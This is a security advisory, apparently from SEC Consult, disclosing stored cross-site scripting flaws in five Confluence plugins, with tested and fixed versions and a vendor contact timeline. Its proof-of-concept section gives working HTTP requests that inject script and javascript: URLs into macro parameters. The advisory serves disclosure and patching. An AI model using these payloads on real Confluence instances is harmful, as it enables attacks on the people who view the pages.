Multiple Cross-Site Scripting Vulnerabilities in Confluence Marketplace Plugins

Project Description

Multiple Confluence Plugins from different vendors are affected by stored cross-site scripting vulnerabilities which allow attackers to inject malicious JavaScript code into Confluence pages.


Vendor description

PlantUML

“Macros to add various UML diagrams and other diagrams”
Vendor: https://www.avono.de

Refined Toolkit for Confluence

“Improve Confluence Pages with Handy UI Tools”
Vendor: https://www.refined.com

Linking for Confluence

“Enable one-click links to access Confluence templates, aggregate resources, and create structured content”
Vendor: https://www.servicerocket.com

Countdown Timer

“Countdown widget for Confluence”
Vendor: www.akeles.com

Server Status

“A collection of some server status tools for confluence”
Vendor: https://aptis-solutions.com

Business recommendation

Update to the latest versions of the plugins. An in-depth security analysis performed by security professionals is highly advised, as the plugins may be affected from further security issues.

Vulnerability overview/description

1) PlantUML – Stored Cross-Site Scripting

The Database Information macro is a component of PlantUML and can be used to inject JavaScript code into Confluence pages, leading to a stored cross-site scripting vulnerability.

2) Refined Toolkit for Confluece – Stored Cross-Site Scripting

The elements UI-Image and UI-Button can be used to inject JavaScript code into Confluence pages, leading to a stored cross-site scripting vulnerability.

3) Linking for Confluence – Stored Cross-Site Scripting

The Link in New Windows macro can be used to inject JavaScript code into Confluence pages, leading to a stored cross-site scripting vulnerability.

4) Countdown Timer – Stored Cross-Site Scripting

The Countdown Timer macro can be used to inject JavaScript code into Confluence pages, leading to a stored cross-site scripting vulnerability.

5) Server Status – Stored Cross-Site Scripting

The two macros HTTP Status and SMTP Status can be used to inject JavaScript code into Confluence pages, leading to a stored cross site scripting vulnerability.

Proof of concept

1) PlantUML – Stored Cross-Site Scripting

In the component Database Information a data source can be configured through the parameter “datasources”. This parameter allows an attacker to inject a JavaScript code. The code is executed when a user visits the page where the macro is used. Below is the example on how the XSS issue can be exploited:

POST /rest/tinymce/1/macro/placeholder HTTP/1.1
Host: confluence:8090
[...]
Referer: http://confluence:8090/pages/resumedraft.action?draftId=65623&draftShareId=ebaa1df3-0bb2-476f-9e83-560e87bdd9a5&

{"contentId":"65622","macro":
{"name":"database-info","params":{"datasources":"<script>
alert(document.domain)</script>","attributes":"sdfdsf"},"body":""}}

2) Refined Toolkit for Confluece – Stored Cross-Site Scripting

In the two components UI-Image and UI-Button the parameter “url” allows an attacker to inject a JavaScript code. This code is executed when a user clicks on the created image/button on the Confluence page.

The following request demonstrates the creation of such an UI-Image macro:

POST /rest/tinymce/1/macro/placeholder HTTP/1.1
Host: confluence:8090
[...]
Referer: http://confluence:8090/pages/resumedraft.action
?draftId=65609&draftShareId=d0b7c806-ec40-4f56-8bdf-bd19474e8073&

{"contentId":"65603","macro":{"name":"ui-image","params":
{"imageUrl":"test","linkUrl":"javascript:alert(document.domain)"},"body":""}}

3) Linking for Confluence – Stored Cross-Site Scripting

The parameter “href” in the Link in New Window macro allows an attacker to inject a JavaScript code. This code is executed when a user clicks on the created Link on the Confluence page.

The following request demonstrates the creation of such a link:

POST /rest/tinymce/1/macro/placeholder HTTP/1.1
Host: confluence:8090
[...]
Referer: http://confluence:8090/pages/resumedraft.action
?draftId=65609&draftShareId=d0b7c806-ec40-4f56-8bdf-bd19474e8073&

{"contentId":"65603","macro":{"name":"link-window","params":
{"href":"javascript:alert(document.domain)","linkText":"click here"},"body":""}}

4) Countdown Timer – Stored Cross-Site Scripting

In the Countdown Timer plugin it is possible to set a countdown date through the parameter “countdowndate”. This parameter allows an attacker to inject a JavaScript code. The code is executed when a user visits the page where the plugin is used.

Below is the example on how the XSS issue can be exploited:

POST /rest/tinymce/1/macro/placeholder HTTP/1.1
Host: confluence:8090
[...]
Referer: http://confluence:8090/pages/resumedraft.action
?draftId=65627&draftShareId=de758257-a056-479e-9e6a-eccdede26003&

{"contentId":"65626","macro":{"name":"countdown","params":
{"countdowndate":"<script>alert(document.domain)</script>"},"body":""}}

 

5) Server Status – Stored Cross-Site Scripting

In the two components HTTP Status and SMTP status it is possible to set a text through the parameter “displayText”. This parameter allows an attacker to inject a JavaScript code. The code is executed when a user visits the page where the plugin is used.

Below is the example on how the XSS issue can be exploited:

POST /rest/tinymce/1/macro/placeholder HTTP/1.1
Host: confluence:8090
[...]
Referer: http://confluence:8090/pages/resumedraft.action
?draftId=65619&draftShareId=efc17088-e2b6-4c29-9f0b-8ee90b4c03b7&

{"contentId":"65618","macro":{"name":"server-status-http-request","params":
{"url":"http://test.com","displayText":"<script>alert(document.domain)</script>","theme":"Color"},"body":""}}

 

Vulnerable / tested versions

The following versions of the plugins have been tested, which were the latest versions available at the time of the test.

  • PlantUML was tested in version 6.43.
  • Refined Toolkit for Confluence was tested in version 2.2.5.
  • Linking for Confluence was tested in version 5.5.3. Countdown Timer was tested in version 1.7.0.
  • Server Status was tested in version 1.2.1.

It is assumed earlier versions of the plugins are also vulnerable to the issues.

Vendor contact timeline

PlantUML

2020-08-19Contacting avono AG (PlantUML) through info@avono.de
2020-08-21Vendor supplies PGP key for security contact
2020-08-21Sending the details of the vulnerability
2020-08-25Vendor releases fixed version 6.44
2020-10-08Public release of the security advisory

Refined Toolkit for Confluence

2020-08-19Contacting vendor through support@refined.com
2020-08-19Vendor automatically creates Jira Ticket
2020-08-24Vendor asks for information about the vulnerability via Jira
2020-08-24Sending the details of the vulnerability
2020-08-26Vendor releases fixed version 2.2.7
2020-10-08Public release of the security advisory

Linking for Confluence

2020-08-19Contacting vendor through apps.support@servicerocket.com
2020-08-19Vendor automatically creates Jira Ticket
2020-08-19Vendor supplies PGP key for security contact
2020-08-20Sending the details of the vulnerability
2020-09-20Vendor releases fixed version 5.5.7
2020-10-08Public release of the security advisory

Countdown Timer

 

2020-08-19Contacting Akeles Consulting (Countdown Timer) through help@akeles.com
2020-08-21Vendor creates Jira Ticket and asks for information about the vulnerability via Jira
2020-08-21Sending the details of the vulnerability
2020-09-17Requesting a status update
2020-09-17Vendor is working on it and there will be soon a new version
2020-09-22Vendor was reminded about the latest possible release date
2020-09-28Vendor will probably release the advisory in CW 40
2020-10-05Requesting a status update
2020-10-06Vendor releases fixed version 1.7.1
2020-10-08Public release of the security advisory

Server Satus

2020-08-19Contacting APTIS GmbH (Server Status) through info@aptis.support
2020-08-31Sending unencrypted advisory as requested by vendor
2020-08-31Vendor releases fixed version 1.2.2
2020-10-08Public release of the security advisory

Solution

PlantUML

The fixed version 6.44 is available at the Marketplace: https://marketplace.atlassian.com/apps/41025/plantuml-for-confluence?hosting=server&tab=versions

Refined Toolkit for Confluence

The fixed version 2.2.7 is available at the Marketplace: https://marketplace.atlassian.com/apps/1211136/refined-toolkit-for-confluence?hosting=datacenter&tab=versions

Linking for Confluence

The fixed version 5.5.7 is available at the Marketplace: https://marketplace.atlassian.com/apps/166/linking-for-confluence?hosting=cloud&tab=versions

Countdown Timer

The fixed version 1.7.1 is available at the Marketplace: https://marketplace.atlassian.com/apps/1211116/countdown-timer?hosting=server&tab=versions

Server Status

The fixed version 1.2.2 is available at the Marketplace: https://marketplace.atlassian.com/apps/1212916/server-status?hosting=server&tab=versions

Workaround

None

Advisory URL

https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

EOF D. Teuchert, R. Ferdigg / @2020

Interested to work with the experts of SEC Consult? Send us your application
Want to improve your own cyber security with the experts of SEC Consult? Contact our local offices.

Project Details

  • TitleMultiple Cross-Site Scripting Vulnerabilities
  • ProductPlantUML, Refined Toolkit for Confluence, Linking for Confluence, Countdown Timer, Server Status
  • Vulnerable versionPlantUML: 6.43, Refined Toolkit for Confluence: 2.2.5, Linking for Confluence: 5.5.3, Countdown Timer: 1.7.0, Server Status: 1.2.1
  • Fixed versionPlantUML: 6.44, Refined Toolkit for Confluence: 2.2.7, Linking for Confluence: 5.5.7, Countdown Timer: 1.7.1, Server Status: 1.2.2
  • ImpactMedium
  • Homepagesee Vendor Description
  • Found2020-08-12
  • ByDaniel Teuchert (Office Bochum), Roman Ferdigg (Office Vienna) | SEC Consult Vulnerability Lab